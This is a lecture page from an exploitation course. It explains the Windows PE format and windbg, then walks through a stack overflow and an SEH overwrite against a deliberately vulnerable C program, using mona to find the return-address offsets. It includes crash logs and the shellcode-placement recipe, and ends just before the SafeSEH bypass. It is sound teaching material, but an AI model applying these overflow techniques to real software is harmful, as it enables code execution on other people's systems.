This is an old revision of the document!
This session will provide a quick intro into Windows Land. We will first explore the windows PE (Portable Executable) file format. On key elements we will try and present the differences between it and what we know about the ELF format. We will briefly explore how certain parts of a PE file get mapped into memory as well as how dynamic library calls are triggered focusing on the elements which are more important for our exploitation needs.
When it comes to exploitation everything in Windows is more verbose an generally harder. Given that the Windows will be featured in only one class we will not be able to feature the bypassing of all its mechanisms. As a target Windows XP will be used (and before you cringe know that it currently has 25% market share vs 6% market share for Window 8). As a debugger we will be using windbg, because the ones with fancy interfaces and plugins are still stuck in 32-bit land, and when it comes to writing or finding rootkits it's basically all you've got. Initially we will explore what it means to explore a vanilla stack overflow and how much more complicated windows shellcode is compared to Linux. Then we will move on to bypassing canary values, and the to exploiting SEH (structured exception handling), as well as it accompanying mitigation strategy called SafeSEH.
This will be done in a DEP and ASLR free environment.
The PE file format has a common ancestor with ELF in the COFF file format and has been around since Win 3.1. Unlike ELF its consistent across all architectures that windows supports and currently comes in tow flavours PE32 and PE32+(for 64bit). In order to interpret the contents of a binary ELF file, a program will find its specification in the WINNT.H file. Below you can notice a birds eye view of the PE file format and awe at its size.
In Windows there are a lot of things that constitute an PE file, among which:
Obviosly we cannot go through all the elements of the PE file in one sitting so are just going to focus on the things that help us figure out what we are looking at in memory.
The good news is that we don't need to know everything about the PE structure for exploitation, so at each important section we will just be talking about the things that do help us. Refer to the first link below to view all the elements
The following image illustrates a rough estimate of what gets loaded into memory
e_lfanew - specified the file offset for the next header
Signature - PE written in ASCII format FileHEader - the File Header OptionalHeaderr - the Optional header
Machine - states if it's a x86 (014c) bit or a x86-64(8664) bit binary TimeDateStamp - Unix style timestamp (measuring since 01.01.1970) applied when the executable was linked NumberOfSections - States the number of sections that follow Characteristics - gives us an idea of the type of file we are dealing with a few of which are:
Magic - State if it's a PE32(10c) or PE32+(20B) file AddressOfEntryPoint - specifies the RVA(Relative Virtual Address) where the code will start executing after the loader has finished SizeOfImage - the size of the contiguous memory that needs to be reserved to load the file in memory SectionAlignment - the file sections are aligned in memory to this boundary FileAlignment -data alignment in boundary on disk ImageBase - preferred virtual address where the PE file should be loaded. DLLCharacteristics - specifies the important security attributes of the executable and more
After the headers that we have just listed will follow a list of sections. Sections inside the PE file serve a similar purpose to those in the ELF file format. Each section entry in the _IMAGE_SECTION_HEADER holds the following useful information:
Name the name of the section VirtualAddress - the RVA relative to the ImageBase defined in the Optional Header PointerToRawData - relative offset from the beginning of the file where the section starts VirtualSize - size that the section occupies in memory SizeOfRawData - size that the section occupies on disk
The import table is Windows's .PLT table basically. It doesn't necessarily work in the same way, but provides the same role, namely as mechanism for calling external functions at runtime.
OriginalFirstThunk - is a RVA to the INT( Import names table), import names table, that is basically an array of IMAGE_THUNK_DATA structs FirstThunk - is the RVA to the IAT( Import Address Table), also an array of IMAGE_THUNK_DATA structs Name - is the name of the module from where the functions will be imported
typedef struct _IMAGE_THUNK_DATA32 { union { DWORD ForwarderString; // PBYTE DWORD Function; // PDWORD DWORD Ordinal; DWORD AddressOfData; // PIMAGE_IMPORT_BY_NAME } u1; } IMAGE_THUNK_DATA32;
Initially both IAT and INT entries point to a IMAGE_IMPORT_BY_NAME structure which has the following key elements:
Hint - using the ordinal of an imported function as a reference from in the exports table of dynamic library Name - function name in ASCII used for name resolution
The INT structures are always interpreted as a u1.AddressOfData as a RVA of an IMAGE_IMPORT_BY_NAME structure. At runtime the IAT structures are resolved by the OS Loader and are subsequently interpreted as u1.Function, as actual memory addresses in where the dynamic library was loaded in the process memory space.
Linux provides the ability of statically linking a dynamic library by including all its code in the executable. In windows you can fill in the IAT entries at link time provided that the DLL you are linking against has a specific version. This functions in a predictable manner because, the PE file format provides an on disk map to find the exact position where a library function will be loaded in process memory. To figure out if the DLL present on disk is the the one we are bound imports are used who's structure is described by IMAGE_BOUND_IMPORT_DESCRIPTOR.
TimeDateStamp - is matched against the same field in Export Address Table of the DLL on disk to verify that the versions match OffsetModuleName - is the RVA calculated from the beginning of the IMAGE_BOUND_IMPORT_DESCRIPTOR table
Delay loaded imports are the very close in functionality to the way that .PLT is used to call external functions at runtime. This is used for calling functions in DLLs that will not be available at load time. In order to achieve a list of IMAGE_DELAY_IMPORT_DESCRIPTOR structures is used out of which the most important elements are:
rvaDLLName the name in ASCII for the DLL rvaIAT - a RVA to a separate IAT structure rvaINT - a RVA to a separate INT structure
Initially the delay loaded IAT entry contains a RVA to some stub code that will basically perform these actions: 1) Check if the DLL has been loaded into memory 2) If not it will call the LoadLibrary() function to add the DLL 3) Then it will call the getProcAddress() function to map the external function address as it was loaded into memory 4) It will fill in the IAT entry with the function address so that subsequent calls will happen directly
For a dynamic library to be useful it must expose an API to call the function it implements. Dynamic libraries in Windows do this by using a mechanism called the Exports Address Table that resides in the IMAGE_EXPORT_DIRECTORY struct. The most important elements are:
TimeDateStamp is used by the bound imports mechanism to match the version of the on disk DLL and figure out if it should be matched into memory AddressOfFunctions - is a RVA which points to the beginning of an array of function RVA called the EAT ( Export Address Table) AddressOfNames RVA which points to the beginning of an array of RVAs to the function names called the ENT (Export Names Table) AddressOfNameOrdinals - RVA that point to the beginning of an array of ordinals Base value that is subtracted from the entry in table pointed to by the AddressOfNameOrdinal to get the zero-indexed offset in the EAT NumberOfFunctions number of functions that can be called by ordinal NumberOfNames the number functions that can be called by name
Currently the all the entries in the ENT are sorted so a simple binary search by name will quickly give us the RVA of the function we are lookig for but in the days of old it wasn't so easy and best practice dictated that you use ordinals, hence the need for the two indexing schemes. To maintain backward compatibility the current scheme still involves using ordinals.
1) Get the index of the name in ENT, pointed to by AddressOfNames 2) Get the value from the same index in the ordinals table, pointed to by AddressOfNameOrdinals 3) Use the value as an index into EAT, pointed to by AddressOfFunctions
Each PE specifies a base address as a preference for where to be loaded into memory. As more DLL's get loaded into memory, the posibility of the same virtual address being requested by multiple libraries gets higher. In ELF, relocations are present in many structures, in windows it's just a standard section called .reloc. Relocations are stored in an array of IMAGE_BASE_RELOCATION structures.
typedef struct _IMAGE_BASE_RELOCATION { DWORD VirtualAddress; DWORD SizeOfBlock; } IMAGE_BASE_RELOCATION;
After each relocation structure we can find an array of 16bit values that specify where and how each relocation will be applied. The first for bits specify a IMAGE_REL_BASED_xxx value that states how the relocation will be applied and the last 12 bits are interpreted based on the specific algorithm. The most used one is IMAGE_REL_BASED_HIGHLOW which means that the relocation will be applied in VirtualAddress+the lower 12 bits
VirtualAddress - is the RVA to which the retractions will be relative to. SizeOfBlock - the number of WORD (16bit) sized relocation targets added to the size of the structure itself
When a executable file gets loaded into memory aside from the elements that are mapped from the PE file on disk two very important structures get created in memory.
Every process is represented in kernel space by an EPROCESS which in turn references several ETHREAD structures for threads. These in turn point in user space to PEB and TEB structure containing some of the following information.
PEB( Process Environment Block)
TEB( Process Environment block)
Like mention previously there are lot of fancy tools out there like Immunity and OllyDBG, but WindBG is the most powerful and complete, being currenltly the only solution if you want to debug kernel stuff. And because your debugging skill is directly proportionate to you exploitation skill a tool like WinDBG is the only way to go.
For exploitation the following setup is reccomended Dismissasembly - actively disassembling the code as EIP move Memory it's usually recommended that you set ESP so you can actively monitor the stack REgisters - it custmoizable Command - command window
You can add/remove windows from the View menu as you wish. To save a layout open windbg without attaching to a process setup the windows and go to File> Save Workspace. Whe you attach to a process ore just start one in windbg you can go to File > Open Workspace and instantly load all the process data to the workspace you wish.
When starting up windbg from the command line some of the following flags are important
QY - Suppresses the “Save Workspace?” dialog box and automatically saves workspaces c - specify a comma separated list of command to be run at startup
windbg -QY SSS_example.exe [program arguments]
For a more complete list of commands:
After you've started a program in windbg in order to reset use Ctrl+Shift-F5
bp - set a breakpoint that will be removed when restarting
0:000> bp 0x00401c21
bu - set a breakpoint that will be won't be removed when restarting
t - step into p - step over g - run until next breakpoint/end u - start dissasembling the code starting from a certain address
0:000> u 00401c20 SSS_example!main [c:\class\sss_example\sss_example\sss_example\sss_example.cpp @ 6]: 00401c20 55 push ebp 00401c21 8bec mov ebp,esp 00401c23 81ec04020000 sub esp,204h 00401c29 68c8224000 push offset SSS_example!GS_ExceptionPointers+0x8 (004022c8) 00401c2e 8b450c mov eax,dword ptr [ebp+0Ch] 00401c31 8b4804 mov ecx,dword ptr [eax+4] 00401c34 51 push ecx 00401c35 ff15a8204000 call dword ptr [SSS_example!_imp__fopen (004020a8)]
? - an excelent operator for perfoming a lot of stuff the most useful being bytewise operations
0:000>? esp+4 Evaluate expression: 1245040 = 0012ff70 0:000> ?00401c35 + 0x34 Evaluate expression: 4201577 = 00401c69
dd dump memory and interpret it as a double words
0:000> dd 00401c20 00401c20 81ec8b55 000204ec 22c86800 458b0040 00401c30 04488b0c a815ff51 83004020 458908c4 00401c40 fc7d83fc 68137500 004022cc 20ac15ff 00401c50 c4830040 ffc88304 558b35eb 08428b0c 00401c60 b415ff50 83004020 858904c4 fffffdfc 00401c70 51fc4d8b fdfc958b 6a52ffff 00858d01 00401c80 50fffffe 20a415ff c4830040 8bc03310 00401c90 00c35de5 00000000 00000000 00000000
.hh - open up a Windows help listing on any command a - modify instructions on the fly as the program is execution you must hit enter after each instruction and the a final enter to implement the changes
0:000> a 00401c3e 00401c3e jmp 0x6 jmp 0x6 00401c43
.load - load windbg plugins !teb - list the TEB information
:000> !teb TEB at 7ffdf000 ExceptionList: 0012ffa8 StackBase: 00130000 StackLimit: 00126000 SubSystemTib: 00000000 FiberData: 00001e00 ArbitraryUserPointer: 00000000 Self: 7ffdf000 EnvironmentPointer: 00000000 ClientId: 00000ccc . 00000d40 RpcHandle: 00000000 Tls Storage: 00000000 PEB Address: 7ffd5000 LastErrorValue: 0 LastStatusValue: c0000135 Count Owned Locks: 0 HardErrorMode: 0
!peb - list the PEB information
!peb PEB at 7ffd5000 InheritedAddressSpace: No ReadImageFileExecOptions: No BeingDebugged: Yes ImageBaseAddress: 00400000 Ldr 00251ea0 Ldr.Initialized: Yes Ldr.InInitializationOrderModuleList: 00251f58 . 00252170 Ldr.InLoadOrderModuleList: 00251ee0 . 00252160 Ldr.InMemoryOrderModuleList: 00251ee8 . 00252168 Base TimeStamp Module 400000 53e2a7ae Aug 07 01:09:50 2014 C:\class\SSS_example\SSS_example\Debug\SSS_example.exe 7c900000 4d00f29d Dec 09 17:15:41 2010 C:\WINDOWS\system32\ntdll.dll 7c800000 49c4f2bb Mar 21 15:59:23 2009 C:\WINDOWS\system32\kernel32.dll 10200000 488ef6c7 Jul 29 13:53:59 2008 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.DebugCRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_f863c71f\MSVCR90D.dll SubSystemData: 00000000 ProcessHeap: 00150000 ProcessParameters: 00020000 CurrentDirectory: 'C:\class\SSS_example\SSS_example\Debug\' WindowTitle: 'C:\class\SSS_example\SSS_example\Debug\SSS_example.exe' ImageFile: 'C:\class\SSS_example\SSS_example\Debug\SSS_example.exe' CommandLine: 'SSS_example.exe C:\attack.bin' DllPath: 'C:\class\SSS_example\SSS_example\Debug;C:\WINDOWS\system32;C:\WINDOWS\system;C:\WINDOWS;.;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\Program Files\Debugging Tools for Windows (x86);c:\Program Files\Microsoft SQL Server\100\Tools\Binn\;c:\Program Files\Microsoft SQL Server\100\DTS\Binn\' Environment: 00010000 =::=::\ =C:=C:\class\SSS_example\SSS_example\Debug ALLUSERSPROFILE=C:\Documents and Settings\All Users APPDATA=C:\Documents and Settings\Administrator\Application Data CLIENTNAME=Console CommonProgramFiles=C:\Program Files\Common Files COMPUTERNAME=XP_HOST ComSpec=C:\WINDOWS\system32\cmd.exe FP_NO_HOST_CHECK=NO [output-omitted]
!exchain - list the SEH chain
0:000> !exchain 0012ffa8: SSS_example!_except_handler4+0 (00401a40) CRT scope 0, filter: SSS_example!__tmainCRTStartup+1dd (0040131d) func: SSS_example!__tmainCRTStartup+1f8 (00401338) 0012ffe0: kernel32!_except_handler3+0 (7c839aa8) CRT scope 0, filter: kernel32!BaseProcessStart+29 (7c8438c2) func: kernel32!BaseProcessStart+3a (7c8438d8) Invalid exception stack at ffffffff
Like we discussed previously windows shellcode is not for the faint hearted. There is no .PLT and no return2lib, if you want something you need to follow that path listed in delay loaded import. Specifically your shellcode needs to see if the DLL to the needed function is in memory, if not it calls LoadLibrary() and then GerProcessAdress(). To get an idea of how much more code that is below you can find two listing showing first linux then windows style shellcode that just echoes “hello world”.
As such it is highly unfesable to write your own every time. To this extent, the msfpayload metaploit script is more than useful at providing the windows shellcode for all your exploitation needs
Windbg is a very powerful tool but it wasn't exactly geared toward exploit development. If GDB has PEDA , windbg has mona. Mona is a powerful python script than can be loaded in winbg with the help of the python extention plugin.
To use mona on the current process you are debugging just run:
load pykd.pyd 0:000> !py mona help Hold on... 'mona' - Exploit Development Swiss Army Knife - WinDBG (32bit) Plugin version : 2.0 r494 Written by Corelan - https://www.corelan.be Project page : https://redmine.corelan.be/projects/mona |------------------------------------------------------------------| | _ __ ___ ___ _ __ __ _ _ __ _ _ | | | '_ ` _ \ / _ \ | '_ \ / _` | | '_ \ | | | | | | | | | | | || (_) || | | || (_| | _ | |_) || |_| | | | |_| |_| |_| \___/ |_| |_| \__,_|(_)| .__/ \__, | | | |_| |___/ | | | |------------------------------------------------------------------|
While using mona a lot of files get created. In order to be more organised when starting to exploit a process you should define a separate working directory
!py mona config -set workingfolder C:\Mona\%p
The above command will store all the generated files int the Mona\process_name folder and also generate a mona.ini file in the directory where the current executable resided so you don't have to redefine the working folder each time you restart windbg
By now everybody should be familiar with how a buffer overflow works, so we're not going to get into that. Instead let's say how we can use mona for exploitation in the fast lane. We run the executable compiled from the following code with no protections activated.
#include <stdio.h> #include <string.h> #include <windows.h> int main(int argc, char **argv) { FILE *fp; int bytes_to_read; char buf[500]; fp = fopen(argv[1], "rb"); if (fp == NULL) { printf("Can't o pen file\n"); return -1; } bytes_to_read=atoi(argv[2]); fread(buf,1,bytes_to_read,fp); return 0; }
It is quite clear that the program is vulnerable to a classic buffer overflow. Let's generate a binary file using the hex editor of choice ,generate 600 bytes of data and run the executable inside windbg.
windbg -QY basic_vuln.exe C:\attack.bin 600
The output in the Command window in windbg should be something allong these lines.
0:000> g (7ac.3ec): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=7855065f edx=003429d0 esi=00000001 edi=00403394 eip=41414141 esp=0012ff84 ebp=41414141 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 41414141 ?? ??? <code> So now instead of doing the heavy lifting let's put mona to work. <code text> .load pykd.pyd 0:000>!py mona config -set workingfolder C:\Mona\%p 0:000>!py mona pc 700 Hold on... Creating cyclic pattern of 700 bytes
This should create a special patter and store it in the pattern.txt file in the C:\Mona\executable_name folder. We open the pattern file eliminate everything but the pattern and serve is as input to the vulnerable executable again. After the crash run the following command
0:000> !py mona findmsp Hold on... [+] Looking for cyclic pattern in memory Cyclic pattern (normal) found at 0x00344170 (length 700 bytes) Cyclic pattern (normal) found at 0x0012fd7c (length 600 bytes) [+] Examining registers EIP contains normal pattern : 0x41327241 (offset 516) ESP (0x0012ff84) points at offset 520 in normal pattern (length 80) EBP contains normal pattern : 0x31724130 (offset 512)
After the crash mona will scan the process memory to figure out where in memory the vulnerable stack buffer is and write offsets from the buffer to various information structures in findmsp.txt file in the defined mona working folder. The vulnerable stack buffer is located at 0x0012fd7c and the address that will lead to EIP overwrite must be positioned at an offset of 516 bytes in the input file. All we have to do now is place the address of the buffer starting at offset 516 in the file , and the shell code we wish to execute at the beginning of the file
One of the key protection mechanisms that has also been implemented in windows are stack canaries. As you already know these value prevent classic buffer overflows by checking some values that have been placed on the stack frame between local variable and the return addreses. Exception handling is built into the Windows operating system and helps make applications more robust. Even if the program developer has not set up any exception handling every thread of every process has at least one handler that is setup on thread initialization. Information about exception handlers is stored on the stack in an EXCEPTION_REGISTRATION structure and a pointer to the first EXCEPTION_REGISTRATION structure is stored in the Thread Environment Block.
But the entries to the default SEH handlers are just some other entries on the stack. Essentially if an attacker can generate enough data he can ovewrite them and by triggering an exception he could bypass the canary value cheking entirely by interrupting normal execution flow.
Again let's put mona to work. Just like above let's generate an attack pattern but this time let's use 1000 bytes.
0:000> g (dac.db0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000041 ebx=000003e7 ecx=00000059 edx=00000000 esi=003443f4 edi=00130000 eip=7855aed8 esp=0012fca4 ebp=0012fcac iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 MSVCR90!memcpy+0xb8: 7855aed8 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 0:000> g (dac.db0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=74413973 edx=7c9032bc esi=00000000 edi=00000000 eip=74413973 esp=0012f8d4 ebp=0012f8f4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 74413973 ?? ???
As we can see the buffer overflow occurred but due to the far larger payload an exception also happened in the memcpy function, but when Windows move to call the appropriate exception handler it was already overwritten. we issue the mona findmsp command and the following output is yeilded.
!py mona findmsp Hold on... [+] Looking for cyclic pattern in memory Cyclic pattern (normal) found at 0x00344170 (length 1000 bytes) Cyclic pattern (normal) found at 0x0012fd7c (length 644 bytes) - Stack pivot between 1192 & 1836 bytes needed to land in this pattern [+] Examining registers EIP contains normal pattern : 0x74413973 (offset 568) ECX contains normal pattern : 0x74413973 (offset 568) [+] Examining SEH chain SEH record (nseh field) at 0x0012ffb0 overwritten with normal pattern : 0x41387341 (offset 564), followed by 72 bytes o
Apparently all we would have to do is pute the buffer address at offset 564 and we're done. But due to the fact that this buffer was severely exploited in Microsoft inserted a sanity check that prohibits the structured exception handler from treating stack addresses as valid addresses to handlers. In order to bypass we must understand how the exception chain is used.